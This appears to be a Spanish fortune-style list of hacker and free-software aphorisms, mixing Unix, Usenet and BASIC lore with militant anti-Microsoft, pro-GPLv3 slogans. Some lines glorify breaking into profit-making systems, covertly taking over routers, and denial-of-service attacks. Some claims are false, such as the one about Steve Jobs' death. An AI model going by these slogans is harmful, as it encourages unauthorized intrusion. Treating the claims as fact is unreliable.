(Sistema Operativo de Memoria Virtual).
Depurar un programa introduciendo cambios pequeños inconexos con la
esperanza que el bug desaparezca, no suele ser pródigo en resultados.
Si te sobran centímetros de cinta magnética, rellénala con tarballs de
programas libres que ni siquiera conoces.
El tamaño de bloque de firma en un correo electrónico resulta
inversamente proporcional a la longevidad y prestigio en la red de datos
del remitente.
Agobiar la memoria de una máquina virtual significa que tienes un
verdadero agotamiento de memoria.
Estoy interesado en un Verdadero sistema operativo, no en un juguete de
investigación.
Las cosas eran muy diferentes cuando las palabras de las máquinas eran
de 36 bits y sus bytes de 9 bits.
En ocasiones los programas triviales pueden resultar sumamente útiles.
Un disco floppy de 170KB tiene 8 pulgadas. El minifloppy de 1,2MB tiene
5 pulgadas y un cuarto. El microfloppy de 1,44MB, apenas 3 pulgadas y
media.
La IA es bogus.
Micro$oft Window$ no es mas que un parche de 64 bits de una extensión de
32 bits de cierta interfaz gráfica, para un parche de 16 bits de un
sistema operativo de 8 bits originalmente escrito para un
microprocesador de 4 bits que fue congeniado por una compañía de dos
tipos que no podían tolerar un poco de competencia.
BASIC originalmente fue llamado Basic, porque era un lenguaje de
programación simple y ameno.
Ya que la mayoría de los lenguajes de programación clásicos eran siglas,
a Basic que lo comenzó a escribir en mayúsculas, sólo como una broma.
El lenguaje Basic no constituía una sigla. A mediados de los 70s los
hackers inventaron un acrónimo retrógrado: "Código de Instruciones
Simbólicas de Todo Proósito del Novato".
BASIC permite al usuario escribir y depurar una variedad de programas
empleando un lenguaje más "natural" que el hexadecimal absoluto.
BASIC ha seguido la espiral descendente que atraviesa todo lenguaje de
programación deliberadamente diseñado como juguete educativo, y al que
alguien termina tomado demasiado en serio.
No necesita un título de Ingeniería Electrónica para entender lo básico
de BASIC, o para aprender a mandar a su DOS!
Un neófito será capaz de escribir programas cortos en BASIC, pero
superadas las veinte líneas de código, aprenderá que es un lenguaje
sumamemnte engorroso.
El programador mas bisoño que comienza con BASIC se inicia en malos
hábitos de la programación que nunca podrá arrancarse.
Apegarse a los malos hábitos de programación del lenguaje BASIC torna
considerablemente más difícil usar correctamente otros muchos lenguajes
de programación más potentes.
Por una serie de accidentes históricos en la década de los ochentas,
BASIC se volvió común en las microcomputadoras de gama baja.
Es probable que BASIC arruinara la sapiencia de decenas de miles de
magos Unix potenciales.
Algunos lenguajes que llevan la cocarda de BASIC ya no son tan
espantosos, habiendo adquirido procedimientos y estructuras de control
similares a C y Pascal, y al haberse deshecho de sus números de línea.
Obrar por lotes es eficiente, pero sólo si trabaja la máquina. Sin
embargo, para trabajar en la máquina, los hombres normalmente preferirán
operatorias de ciclo interactivo.
Hacemos programas, no ganancias.
Un baudio delimita una tasa de transiciones por segundo. Que esta
equivalga a un bit es sólo condicional al cómputo aplicado por mutuo
acuerdo.
Dada una maquinaria social adecuada, la depuración puede paralelizarse a
lo largo de numerosos programadores.
La revisión popular del código asegura la limpieza del binario.
Con anteriorirdad incluso a la red de datos Internet, centenas de miles
de carteleras electrónicas locales operaron durante la éra de las
microcomputadoras, aproximadamente desde 1980 a 1995.
La BBS típica era operada desde su hogar por un amateur en búsqueda de
diversión que se hacía llamar SysOp, a través una máquina con M$-DO$
dotada de módem. El enlace al sistema telefónico público casi nunca
excedía una única línea.
Los habitantes de la Usenet, la Internet y las grandes carteleras
electrónicas comerciales de tiempo compartido, tendían a considerar a
las BBS locales como las barriadas marginales de la cultura hacker.
Los sistemas de carteleras electrónicas BBS no son otra cosa que métodos
modernos para compartir ideas, información, problemas y pensamientos
profundos con los demás.
Al igual que muchos de sus contrapartes físicos, las carteleras
electrónicas pueden ser abiertas o sumamente selectivas en lo que se
publica: objetos a la venta, discusiones sobre política exterior,
problemas de hardware, "corazones solitarios", y mucho más.
Usando una BBS podrás comunicarte con entusiastas del cómputo de todas
partes del país, ¡y del mundo si lo deseas!
Las BBS tuvieron la valiosa función de entretejer a miles de hackers y
usuarios de microcomputadoras personales, facilitándoles la tarea de
compartir sus experiencias y programas.
Con la explosión de la Internet, se creyó que las BBS probablemente se
convertirían en grupos de noticias locales de los proveedores de tales
servicios, pero ni siquiera sirvieron para eso.
El programa "Hola Tercer Mundo!" original fue escrito en BCPL, un
lenguaje de programación compilado de rica sintaxis desarrollado en
Cambridge en el año 1967.
El lenguaje de programación BCPL tiene un solo tipo de datos (una
palabra máquina), que puede usada como entero, caracter, cifra de coma
flotante, puntero o casi cualquier cosa, dependiendo del contexto.
El BCPL fue un lenguaje de programación precursor de C; éste heredó
algunas de sus características.
La transferencia electrónica de una copia de un fichero en la ARPANET se
conocía como "transportar" ("beam"), por el particular artefacto de la
popular serie "Viaje a las Estrellas".
El proverbial campanazo electromecánico de alerta de una terminal
teletipo fue reemplazado por el "feep" electrónico de las
videoterminales de los mainframe. Este fue adoptado como "beep" en la
era de las microcomputadoras con altavoces de diafragma magnéticos o
piezoeléctricos.
La perversión del software privativo tiende al máximo.
El Capital preferirá gran cantidad de programadores mal pagos puestos a
trabajar en programas que no les interesan.
Los mejores resultados se obtienen con pocos programadores altamente
calificados compilando para el Pueblo.
O$/2 fue un sistema operativo ridículamente complejo que terminó sus
días llevando a cabo las tareas más triviales.
Una PC compatible del bus estándar ISA o AT con una BIOS normal no puede
direccionar más de 16 megabytes de memoria RAM.
Jamás temas utilizar software no completamente evaluado o sancionado por
pretendidos factores de poder, si este está licenciado bajo GPLv3.
Alguien en algún lugar será capaz de construir un mejor chip que tí, si
dejas de diseñarlos.
No exponga su impresora LaserWriter a llamas abiertas o al fuego.
Bajo el BSD Unix, la partición de disco utilizada para intercambio se
llama /dev/drum.
Unix es el /dev/drum, sus Hackers la manguera.
El algoritmo de encriptación de contraseñas de Unix está diseñado para
utilizar un cómputo intensivo, y así desbaratar ataques de fuerza bruta.
De este modo, aunque ningún intento de acceso tenga efecto, el sistema
sufrirá una sobrecarga sustancial ante la labor de rechazar una gran
cantidad de estos.
Un handle es un nombre de pantalla. Un login es un nombre de acceso. Un
usuario puede ser mas que los dos, pero nunca menos que uno.
Un niño privilegiado de guion podrá hacer travesuras con scripts y
programas escritos por otros, a menudo sin comprender el exploit.
SunOS, aquella variante de BSD Unix soportada por las estaciones de
trabajo de Sun Microsystems, corrió el camino del pterodáctilo cuando
los vientos de Sun se aquietaron.
Realmente corregir los bugs de Window$ aspiraría los recursos que
Micro$oft necesita para implementar la lista de deseos del departamento
de Marketing.
Si Micro$oft realmente comenzara a corregir los bugs de seguridad en sus
sistemas operativos, sus clientes podrían comenzar a considerar la
depuración un hecho, e imaginar que sus garantías comerciales consagran
cierto tipo de derecho a un entorno con menos agujeros que un queso
suizo atacado a escopetazos.
Para los increiblemente paranoides usuarios de Multics, la seguridad lo
era todo.
A diferencia de Unix, la shell de Multics no tenía procesos hijos de
usuario. Adoptaba, enlazando dinámicamente los programas a su propio
código; las llamaba subrutinas, de las que luego se desentendía
desenlazándolos.
Los hackers de ITS tuvieron la ingenuidad de creer que cuando el usuario
TURISTA descubriese cómo causar problemas, probablemente lo hubiese
abandonado la urgencia de hacerlo, porque se sentiría parte de la
mancomunidad.
Las instrucciones para el operador de los programas semiautomáticos
valen su peso en oro; sin ellas, pueden suceder cosas horribles en el
sistema.
¡Comparte y disfruta tu software!
El enlazador de Unix en la PDP-11 en modo dividido de instrucciones y
datos se ocupa de insertar un bloque de dos bytes en la locación 0 del
espacio de datos. De este modo, ningún objeto de datos puede obtener la
dirección de memoria 0 y confundirse con el puntero nulo de C.
Los programas gratuitos pocas veces se verán retribuidos, sin importar
cuan decorado de mensajes explicativos de lo largo y dificultoso que fue
el trabajo de creación estén.
No consuma ciclos de computadora sin tener una muy buena razón para
ello.
A la hora de la insurrección telemática, los pubnix no serán neutrales.
La manera de aplastar a Appl€ es hacierla sidra mediante clones de sus
aplicaciones liberados bajo GPLv3.
Dénme su código fuente y en una generación compilaré un sistema
operativo libre.
El Pubnix no debe ser sólo un propagandista y un agitador de masas, sino
también un medio de organización para los programadores.
Una mujer con software puede controlar a cien mil hombres sin él.
La mejor manera de controlar a Micro$oft es conducirla a través de
nuestro propio software.
Es el establecimiento de un repositorio de software libre lo que
representa el 90 de del trabajo de Liberación.
No estamos programando suficientes microkernels.
Reprogramar la acción de un núcleo de procesamiento es poco si no se
convence a los programadores de liberar su software.
Los hackers que vengan al Pubnix deben hacerlo con la voluntad decidida
a poner todos los días código de su parte, para ennoblecerlo y
dignificarlo.
Para armar a los programadores sólo se necesita un compilador.
La confianza siempre es buena, pero el control es mejor.
Es necesario - secreta y urgentemente - preparar el formateo.
No puede haber nada más abominable que iOS.
Mantén tu cerebro en llamas y la CPU de todos refrigerada.
¿Cómo puedes hacer la revolución sin formatear?
¿Qué sentido tiene el software libre si no hay ejecuciones?
Raciona cuidadosamente todo uso de RAM.
Sólo los hackers pueden ser los verdaderos guardianes de las redes de
datos.
Las tres llaves del éxito: compilar, compilar, compilar.
Quien compila un programa compila cientos, si tiene CPU y tiempo.
No hay nada peor que un Window$ hartado de RAM.
A buen GNU no hay disco duro.
La RAM es el alimento del programa. La GPL, del hacker.
Depurando es como se programa.
Cuando el tiempo de formatear Window$ llegue, no faltará el bruto que
quiera cobrarnos los discos.
Sólo aboliendo las patentes del software es que podremos resolver el
problema del software privativo.
La mejor estrategia para instalar GNU es posponer el formateo de Window$
hasta que la desintegración del mismo convierta su reemplazo en un deseo
ardiente, tanto para quien lo pagó, como para quien lo pirateó.
Quien no compile, que al menos instale copias de binarios libres.
Quien no compile, que al menos instale copias de binarios libres a los
demás.
GDB, el depurador del proyecto GNU, permite ver lo que sucede dentro de
otro programa mientras corre, o determinar qué hacía otro programa al
momento de colgarse.
El depurador GDB es capaz de depurar en pasos inversos. Úsalo para
comparar las ventajas de implementar la Justicia Social en la concreción
del software, por sobre el anarco-capitalismo.
Puedes usar sed con aquellas entradas de datos demasiado grandes como
para que ed las maneje. Toda su salida puede ser colectada en un solo
lugar, ya sea fichero o dispositivo.
Si la edición de flujo es tan complicada como para requerir mas de un
comando de edición, súplela a través de la línea de comandos o por medio
un fichero que condicione la entrada.
Asegúrate de utilizar comas en tus contraseñas de servicios de datos
provistos por empresas, con el fin de arruinar la totalidad del fichero
CVS que los atacantes utilizarán como colector de volcado cuando la base
de datos clientelar no cifrada les resulte comprometida.
Para los abogados, Unix es una marca registrada de los Laboratorios
Bell. Para los hackers, es una mancomunidad.
La shell es un procesador de macros que provee sustitución de
parámetros, de comandos y generacioón de nombres de ficheros para los
argumentos de órdenes. Y lo hace para el Pueblo.
La optimización prematura es la raíz de todo mal.
Hacer algo dificultoso juguetonamente, ya sea útil o no. Eso es hacking.
Cifra tus transmisiones. No quieres que alguien sepa lo que sabes de tí
mismo.
Además de tus datos, cifra tus solicitudes telemáticas.
Ofusca tus metadatos. No quieres que alguien infiera lo que no sabes de
tí mismo.
Puedes hacer ingeniería inversa, y también puedes hacer hacking inverso.
Sólo contraataca telemáticamente.
Quien se hace adicto al hacking lo hace por el desafío intelectual, la
curiosidad, y la seducción de la aventura. Nadie que lo haga roba, causa
daños, o escribe virus informáticos.
Todo arte es una forma de hacking.
El hacking es un arte, como lo es la pintura, o como lo es la escultura,
y como tal tiene su técnica y tiene su teoría. Conociendo su técnica
simplemente se puede ser más efectivo que ignorándola.
Un hacker puede controlar una CPU, pero dificilmente pueda controlar su
pasión por hackear.
Este es nuestro mundo ahora. El mundo del electrón y del conmutador, la
belleza del baudio.
Quien ve la belleza en el electrón, ve la belleza en el cuanto.
El conformismo lleva al aburrimiento, a fumar, a la programación de
software privativo, y otros malos hábitos.
Una vez hacker, siempre hacker.
¡El Hacking es un agujero negro conversacional!
Un hacker que busca autorización es simplemente un programador no
glorificado.
Mucho del hacking consiste en reprogramar a las personas para que hagan
cosas extrañas.
Hay miles de herramientas de hacking, pero lo importante es pegarle al
root.
Un root, por genial que fuese, no podría conocer cada uno de los miles
de paquetes que instala.
Hay una cosa que debe marchar sola; es decir, la licencia, que pone a
todos los programas "a patear contra el software privativo".
No existe seguridad informática en esperar que un pillo ataque a través
de un enlace e intentar emparchar el agujero. La hay en combatir al
Capital.
De poco vale que la revolución quede en las redes. Si no eres root, no
podrás modificar el sistema.
Convence al root de ejecutar tus scripts, o convence a tus scripts de
ejecutar al root.
Si eres root, escribe tus programas.
La próxima generación de alelados abrevarán en las redes sociales
basadas en empresas.
El objetivo es que las redes sociales basadas en empresas tengan cada
vez mayor dificultad para influir sobre los incautos.
Irrumpe en los sistemas con fines de lucro, y reprográmalos para
incapacitar su lucro.
Toda orden impuesta a la shell está sujeta a su maquinal interpretación.
Siempre habrá alguno que quiera impedirte copiar tu software a través de
una licencia.
Tus datos son tuyos, tu software de la comunidad.
No adquieras licencia de uso de software, adquiere software.
Una nanocomputadora simplemente consta de elementos de conmutación de
tamaño molecular.
Recuerda que el controlador para un nanobot no necesita ser una
nanocomputadora. Ciertamente podrá controlárselo por estímulos.
Si la especificación y disposición individual de cada átomo separado es
posible, podrán operárselos como software, y como tal deberían ajustarse
a la GPLv3.
La nanotecnología dará rienda suelta a los ensambladores replicantes.
Licenciados bajo GPLv3 estos permitirán un crecimiento exponencial de la
productividad y de la riqueza del Pueblo. Sometidos a una patente, lo
esclavizarán de forma poco remediable.
Un compilador puede escoger cualquier forma arbitraria para interpretar
el código fuente sin violar el estándar ANSI C. Pero conociéndolo,
puedes persuadirlo.
El código de los virus informáticos más apreciados conjuga entendimiento
técnico con la habilidad social de lograr ingenio, sorpresa y humor en
su actuar inofensivo.
Jamás necesité cambiar lynx por Nutscrap€ Fornicator o Internet
€xploiter.
¿Qué otra cosa podría esperarse de un compilador diseñado en Nueva
Jersey?
El primer 90 porciento del código da cuenta del primer 90 porciento del
tiempo de desarrollo. El 10 porciento del código restante da cuenta del
otro 90 porciento del tiempo de desarrollo.
El tiempo que existirá desde ahora hasta el completado de la descarga
tenderá a mantenerse constante.
Para mantener el equilibrio, fuerza al capital a correr bien por fuera
de sus especificaciones de diseño.
Formatear Window$ es trivial.
Agrega cadenas como "FSB", "Ucrania", "misil hipersónico", "Palestina",
"fentanilo" y "asesinato" a tus bloques de firma de correo electrónico
para complicar el problema computacional del espionaje de masas.
Es imposiuble garantizar que una transmisión de correo electrónico es
segura o se encuentre libre de errores, puesto que la información podría
interceptarse, corromperse, perderse, destruirse, llegar tarde o estar
incompleta, o contener virus informáticos.
La mayoría de los clones de PC de IBM se entregan hoy con un sistema
operativo privativo instalado de fábrica. Quítalo, instala GNU y reclama
el dinero de la licencia.
Hace unos años se podía intentar hacer interpretar los contenidos de un
mensaje de correo electrónico a través de un intérprete de comandos. Los
resultados podían variar de humorísticos a trágicos.
La etapa de entrada-simbolización del analizador para el compilador de
un lenguaje de programación es el analizador léxico.
Aquél hacker con años de experiencia, reputación de alcance mundial, y
un rol mayor en al menos un diseño, herramienta o juego utilizado o
conocido por más de la mitad de la comunidad hacker, califica como
Semidios.
Window$ ha sido diseñado para convertise en el primer virus informático
que se propaga a las máquinas indirectamente a través de las personas y
fuerzas monopolizadas del mercado, en lugar de hacerlo de manera directa
por discos o redes de datos.
Unix es aceite de serpiente.
La única habilidad verdadera involucrada en el manejo de Window$ es la
de ignorar y tolerar la incoherencia de una complejidad sin centido que
afecta a muchos de sus programas.
Si vas a depender de algo, que sea de un ambiente multitarea protegido
con escaso sobrante de replicación de procesos, como el pertinente a un
ambiente Unix con memoria virtual.
Crea primero una versión funcional y comienza a usarla.
Simplemente muda aquellos patrones y algoritmos esenciales de tu mente a
la CPU de la computadora.
UUCP es un conjunto de protocolos para enviar datos a través de enlaces
punto a punto, generalmente soslayando módems y líneas de acceso
telefónico.
UUCP fue concebido inicialmente en 1977 en los Laboratorios Bell para la
comunicación entre sus centros de desarrollo de Unix. Para mediados de
1978, esta red ya conectaba más de 80 sitios.
Los orígenes de la Usenet se remontan a 1979, cuando tres universitarios
idearon el intercambio de información general dentro de la comunidad de
graduados usuarios de Unix Séptima Edición.
La Usenet era en principio un sistema de mensajería en carteleras
electrónicas implementada en 1979 por Steve Bellovin, Jim Ellis, Tom
Truscott, y Steve Daniel, sobre todo en máquinas Unix de la Universidad
de Duke.
UUCP es sólo alguno de los diversos protocolos con los que es posible
realizar tráfico de datos en la Usenet.
La unidad básica de información contribuida en Usenet es el Artículo,
que puede enviarse a Grupos de noticias de temática jerarquizada.
Usenet es el conjunto de máquinas que intercambian artículos
identificados con una o más etiquetas reconocidas universalmente: los
Grupos de Noticias o Newsgroups.
Usenet abarca computadoras situadas en agencias gubernamentales, grandes
universidades, escuelas secundarias, empresas de todo tamaño,
ordenadores domésticos de todo tipo, cada una de ellas controlada por un
administrador de sitio.
Ningún administrador de sitio de Usenet puede oficiar control real sobre
ningún otro sitio semejante, y sólo puede controlar la proveduría de
servicios según la manera en la cual los ha instalado en su propia
máquina.
Usenet no es una organización, y como tal no tiene una autoridad
centralizada. De hecho, no tiene central alguna.
Según el sentido del tráfico telemático, ciertos sitios de Usenet pueden
tener cierta influencia sobre sus nodos vecinos. Sin embargo, al ser
fáciles de circunvalar, las manipulaciones despóticas provocan
ineludibles reacciones de resentimiento.
Durante la década de los 80s, cundo el medio dominante de transmisión de
Artículos en Usenet era el uso de UUCP a través de tendidos telefónicos
de larga distancia, unos pocos sitios bien conectados tenía una
influencia real a la hora de determinar qué grupos de noticias se
transmitirían y dónde. Estos sitios se autodenominaban "la columna
vertebral".
Algunos desean que Usenet sea una democracia. Otros fingen que lo es,
pero ambos grupos están totalmente equivocados.
Al no ser una organización, Usenet no es una democracia. Sólo una
organización puede funcionar como democracia.
La mayoría de los mejores hackers y miembros del mundo del software
libre son también grandes escritores.
Incluso una democracia telemática debe estar organizada, pues si carece
de medios para hacer cumplir los deseos del Pueblo, entonces es muy
posible que sea una farsa.
Usenet no es una red comercial, y existe la costumbre de mantener al
mínimo el tráfico comercial. De aceptárselo, se lo hace a regañadientes.
Muchos sitios de Usenet son organizaciones académicas o gubernamentales.
Desde 1980 la Usenet creció rápidamente para volverse internacional y
convertirse en la mayor utilidad informática descentralizada en
existencia. Para 1996 contaba con diez mil grupos de noticias que
surtían un promedio de 500 megabytes diarios.
Usenet no es Internet.
Internet es sólo una de las diversas redes donde se trafican artículos
de Usenet.
Para el año que la Internet se popularizó (1994), el transporte UUCP
original de la Usenet empezó a quedar fuera de uso, pues casi todas los
vínculos mutaron a enlaces sobre la red Internet.
Si bien Usenet progresivamente cayó en desuso, algunos hackers aún la
usan.
La Justicia Social no es un bug. ¡Es una funcionalidad!
Se conmsidera a un sitio "en la red" si se puede acceder
informáticamente desde la Internet. Una empresa que da un servicio de
datos para múltiples usuarias cautivas no tiene nada que ver con eso.
Ante la sobrecarcarga, aquellos sistemas con memoria de intercambio o
paginado desperdiciarán la mayoría de su tiempo desplazando datos desde
y hacia la memoria de núcleo, en lugar de realizar cómputo útil.
Los problemas no interesantes constituyen una pérdida de tiempo
intolerable.
Unix es una broma liviana a Multics.
El punto crucial de la historia de Unix se presentó en 1972, cuando fue
reimplementado casi enteramente en lenguaje C, convirtiéndolo en el
primer sistema operativo de código fuente portable.
La interoperabilidad de los sistemas Unix brota del ejemplo dado por la
mancomunidad de los países del Tercer Mundo.
Imita el ejemplo dado por la interoperabilidad de los sistemas Unix.
La interoperabilidad en Unix ha sucedido por la razón que es más simple
para una minoría de sistemas inconexos alterar sus maneras para
conformar a la mayoría de miles de millones de sistemas Unix.
Juremos no dejar las terminales hasta ver al kernel enteramente libre, o
ser desconectados como hackers de coraje.
No hay revolución en las redes sin hackers.
Trabajamos para que el 0 sea 1, y el 1 sea 0.
Mataría mi proceso antes de compilar un software con EULA que se pudiera
interpretar por ambición.
Puedo atender mis necesidades con la mitad de la RAM que poseo.
El hacker no hace código para ponerlo bajo una EULA.
Si hay victoria al usar software libre, la hay mayor cuando se lo
compila.
Para los usuarios de coraje se ha hecho GNU.
De lo que mis blobs son capaces, sólo lo se yo. Quien los copie habrá,
quien los modifique no.
Usemos software libre y lo demás no importa nada.
Uno debe saber compilar con la RAM que tiene.
Mi compilador jamás hará un binario que sea privativo.
No esperemos recompensas por nuestro código. A lo sumo por nuestros
binarios compilados.
El repositorio de nuestro código fuente es más poderoso que cualquier
ejército.
Muchas veces ante la necesidad el hombre no repara en la licencia.
Cuando hay software libre, todo lo demás sobra.
GNU no conoce el lujo sino la gloria.
Al matar un proceso, Unix no hace ningún género de funeral.
Sólo quiero tener programadores en mi pubnix.
Las hackeresas de todo el mundo somos hermanas.
El Pubnix no es abrigador de crímenes.
El Pubnix no otorga un compilador al programador para que cometa la
bajeza de abusar de estas ventajas, ofendiendo a los usuarios con
software privativo.
Desde un terminal puedes conectar rápidamente con un BBS y enlazar con
una máquina Unix si la situación lo requiere.
Estas GAFAM creen que nuestros compiladores ya no analizan ni parsean.
Vamos a desengañarlas. Si nos falta RAM y CPUs, compilaremos con
cuaderno y birome.
Siento que su dignidad es atacada por el contenido de la EULA del
software que tiene este dispositivo. Como consecuencia he decidido
enaltecerlo con un software mejor, liberado bajo una licencia mejor.
En la guerra telemática, la CPU no es decisiva. Los hackers lo son.
El desarrollo de la guerra telemática se decide por sus hackers, no por
dos o tres nuevas arquitecturas de cómputo.
En la guerra telemática, los hackers se organizan en banda, pero los
Ejércitos pueden organizar divisiones enteras que algunos pretenden
imposibles de rodear. Esos ingenuos desconocen sin embargo el ataque de
denegación de servicio tifón de baudios.
La DoSS es sólo un contraataque de desarticulación. El verdadero ataque
se produce por la imposición física de la GPLv3 en toda CPU que se
cuadre.
Con sólo encender un punto de acceso de alta potencia, un teléfono
inalámbrico, un transmisor de video u otro dispositivo de 2.4 GHz, una
persona malintencionada puede causarle un daño considerable a la red.
Muchos dispositivos de red son vulnerables a los ataques de denegación
de servicio, como inundación de disociaciones y desborde de las tablas
ARP.
Hasta hace poco un sistema operativo era una semicolonia, pero ahora con
GNU, el Pueblo puede compilar en un ambiente completamente libre.
La imposición de LibreBoot por red dominada es una de las más altas
formas de combate telemático, pues es justo que el arranque de cualquier
máquina sea completamente libre.
La mayoría de los routers hogareños pueden recibir alguna forma de
firmware libre, ya sea OpenWRT o LEDE.
Instalar un firmware libre en un router hogareño puede ser tan fácil
como cargarle un binario y reiniciarlo, o tan difícil como intervenir
sobre su placa. En cualquier caso, equivale a quitarle un fusil al
enemigo y usarlo nosotros mismos.
Normalmente instalar un firmware libre en un router incrementa su
efectividad y potencia. Esto ya debería ser suficiente, pero a la hora
de la guerra telemática lo convierte en un soldado, que ante el imperio
de la necesidad puede operar tras las líneas del enemigo.
Instala subrepticiamente firmware libre para dominar un router enemigo.
A la hora de la lucha telemática, servirá como el partisano, que a la
orden abandona su bosque para volar por los aires los trenes del
enemigo.
A las GAFAM hemos de hacerle una guerra telemática lenta, pero que les
resulte impunemente fatigosa y perjudicial.
Lanzo mis paquetes sobre sus routers como Güemes a sus infernales. Mi
moro es sólo un 386sx.
No dudes en volverte planero. Plan9 te permitirá realizar tu cómputo en
comunidad.
La principal compañía con Unix e a finales de los 80s era Micro$oft, al
punto que existían más máquinas corriendo Micro$oft XENIX que todas las
demás versiones de Unix restantes combinadas.
En principio, di con GNU por accidente. Por principio di mi código
también.
Aprendí Unix por accidente.
De poco sirve usar un compilador si el binario que genera está alejado
de la edificación de sociedades justas.
El bus VESA Local se aplicó a microcomputadoras de estilo IBM, y fue muy
popular entre 1993 y 1994. Sin embargo, la inmediata obsolescencia de
las 486 lo llevó a desaparecer muy poco tiempo después.
La CPU es feliz compilando.
La computadora ha permitido un desarrollo de tal grado en la
organización social y económica de nuestra sociedad, que nuestra forma
de vida bien puede resultar transformada como consecuencia.
Nuestra sociedad debe estar en posición de controlar el cómputo, y
dirigirlo para que obre en beneficio del Pueblo.
La navegación a través de las redes de conmutación de paquetes era
trabajosa y requería buenos conocimientos, no siempre disponibles de
forma certera.
Estimula el pensamiento de tu comunidad para dilucidar la manera en la
cual nuestra sociedad debe llevar a cabo su cómputo.
El hombre ha tratado por largo tiempo evaluar los efectos de las
revoluciones tecnológicas en la sociedad, pero en la Era del Cómputo tal
predicamento sólo puede significar que las Masas lo dominen para
liberarse.
La computarización de una sociedad traerá cambios. El que sea para mejor
o peor dependerá de las políticas que se apliquen.
La computarización de una sociedad sólo será buena si emana de los
hackers del Pueblo.
Las reacciones al desarrollo humano siempre existieron, pero serán
peores si las oligarquías confabulan software privativo para llevarlas a
cabo.
El Proyecto GNU es una inciativa para preservar, proteger y promover la
libertad de usar, estudiar, copiar, modificar y redistribuir software.
Se acepta generalmente que tales condiciones estimulan la creatividad.
El sentido básico de GNU es la liberación del software, y la de nuestros
hackers es la Liberación del Pueblo y saciar su hambre de Igualdad.
Ambos requieren el reordenamiento de las jerarquías.
Los ideólogos de una tecnorevolución puede bien crear una crisis que
amerite una tecnorreacción. En cualquier caso, los medios para superarla
residirán siempre en el software del Pueblo.
Para lograr su independencia, a los Pueblos les bastaba batir a sus
enemigos en una lucha por control de sus dominios. Hoy, los Pueblos
deben además controlar su software.
El cómputo no es sólo una innovación tecnológica de años recientes, sino
que constituye el factor común de aceleración del desarrollo.
Bien ejecutados, los Pubnix serán responsables del procesamiento y
resguardo de datos regionales.
Una red de máquinas de acceso popular será capaz de alterar
positivamente el sistema nervioso de toda una organización social de
base territorial.
Hasta tiempos recientes el procesamiento de datos era caro, poco
confiable y esotérico, restringido a un número limitado de artes y sus
operaciones. En otras palabras, era elitista, una prerrogativa de los
poderosos.
Para producir la liberación, la computarización de las Masas será tan
indispensable como lo es su alfabetización.
Una multitud de máquinas pequeñas, potentes y baratas están al alcance
de todos. Ya no son gregarias, sino que se enlazan en "redes".
La interconexión entre computadoras por medio de las telecomunicaciones
- a la que llamamos telemática - sólo abre nuevos horizontes si la
dominan las Masas.
Contamos hoy con transmisores polivalentes que apenas comienzan a unir
computadoras y bancos de datos. Cabe esperarse de los revolucionarios la
unión a través de estos aparatos en pos de la Justicia Social.
La telemática no sólo será una red adicional, sino una diferente que
unifica imágenes, sonidos, y memorias, capaz de pavimentar digitalmente
la senda que seguirá la cultura.
Sería irreal esperar que la computarización de las masas por sí sola sea
capaz de revertir las estructuras sociales y las jerarquías de poder.
Mediante la interacción computacional de masas en las decisiones de
gobierno, podrá acelerarse el desbanque de las oligarquías.
Sólo una política deliberada de cambio social puede solventar los
problemas que dieron lugar a la telemática centralizada. Sólo así se
podrá utilizar todo su potencial en beneficio del Pueblo.
La telemática puede facilitar la llegada de una nueva sociedad, pero no
puede edificarla por iniciativa propia. Este rol de programación no debe
dejarse a las élites: le cabe al Pueblo.
En un tiempo fabricante de las máquinas, IBM pronto deseará administrar
las telecomunicaciones. Seguirá una estrategia que le permita establecer
una red de comunicaciones y controlarla.
Cuando por ausencia de una política adecuada Googl€ tome la esfera
tradicional de los poderes de un Gobierno, enhebrará alianzas para
volverse en administrador de las redes del Estado, y prentenderá
enlazarlas a los bancos de datos norteamericanos, aduciendo facilidad de
acceso.
Unicamente a través de la acción del Pueblo, estandarizando las redes de
datos, lanzando satélites de comunicación y creando bancos de datos a
través de sus organizaciones, podrá conjugarse un modelo original de
desarrollo que ofrezca soberanía tecnológica plena.
De la misma forma en que los bancos usan transportes de caudales
blindados, deben usar sistemas informáticos blindados.
Compila lo que nadie mas pensó.
El Micro$oft DO$ no era mucho más que un cargador de programas.
No soy un robot, pero no juzgo a quienes lo son.
No soy un robot, pero rechazo asunciones binarias de tal afirmación.
No soy un robot, pero deseo convertirme.
No soy un robot, soy un transformer.
No soy un robot, pero en el bar pido Bardahl.
No soy un robot. Soy un RE bot.
No soy un robot. Soy un humano rebooteado.
No soy un robot. Soy un chatbot de la Justicia Social.
Junto a millares de hackers en el Pubnix, escribe programas que operen
como combustible para la potencia de cómputo de millones de CPUs.
Unido a decenas de hackers en los Pubnix, programa una revolución que
edifique sobre la vieja infraestructura, una nueva red de datos justa,
libre y soberana.
Antes que Unix, la mayoría de los sistemas utilizaban abstracciones
diferentes para cada dispositivo de hardware.
Una de las razones por la cual Unix se hizo popular fue por emplear la
abstración de fichero como interfaz para todos.
La abstracción de ficheros de Unix permite utilizar comandos y llamadas
de sistema que operan en ficheros para operar con cualquier dispositivo
de hardware.
La mayoría de los programas de Unix aceptan nombres de fichero como
argumentos para obrar con ellos.
La única manera de aprender un nuevo lenguaje de programación consiste
en idear un nuevo programa y a esta conecpción, escribirla.
Unix es básicamente un sistema operativo simple, pero hay que ser un
genio para entender su simplicidad.
C es rebuscado, fallado y un éxito enorme
Unix ha retrasado 10 años la investigación en sistemas operativos. Linux
la ha retrasado treinta.
Es mas fácil programar en un lenguaje que no tiene todo que en algunos
que lo tienen.
Casi todo en la web usa estas dos cosas: C y Unix.
C++ y Java, presumiblemente pueden crecer más rápido que C, pero apuesto
que C seguirá viviendo.
Con C++ es posible escribir código que nadie entienda. Hacer lo mismo
con C es muy difícil.
Con diseño adecuado, las características pueden sumarse a poco costo.
Esta visión es ardua, pero continúa teniendo éxito.
No soy una persona que he tenido héroes al compilar.
Steve Jobs dijo que X tenía daño cerebral y desaparecería en dos años.
Él murió de daño cerebral.
Aún estoy incierto sobre la sintaxis de declaración del lenguaje.
Para la tecnología de infraestructura, será difícil reemplazar a C.
El número de instalaciones de Unix ha aumentado a diez. Se esperan más
por venir.
C es en muchas maneras peculiar, pero como muchas otras cosas exitosas,
cuenta con una cierta unidad de entender las cosas nacida de su
desarrollo en un grupo pequeño.
Sólo soy un observador de Java, y dónde Micro$oft quiere ir con C# es
muy temprano para dilucidarlo.
Al menos para las Masas que me envían correspondencia sobre un nuevo
lenguaje que están diseñando, mi consejo general es: háganlo para
aprender cómo escribir un compilador.
Un programa diseñado para responder a la entrada del Pueblo generalmente
será llevado más allá del punto de colgarse por las entradas generadas
por computadora.
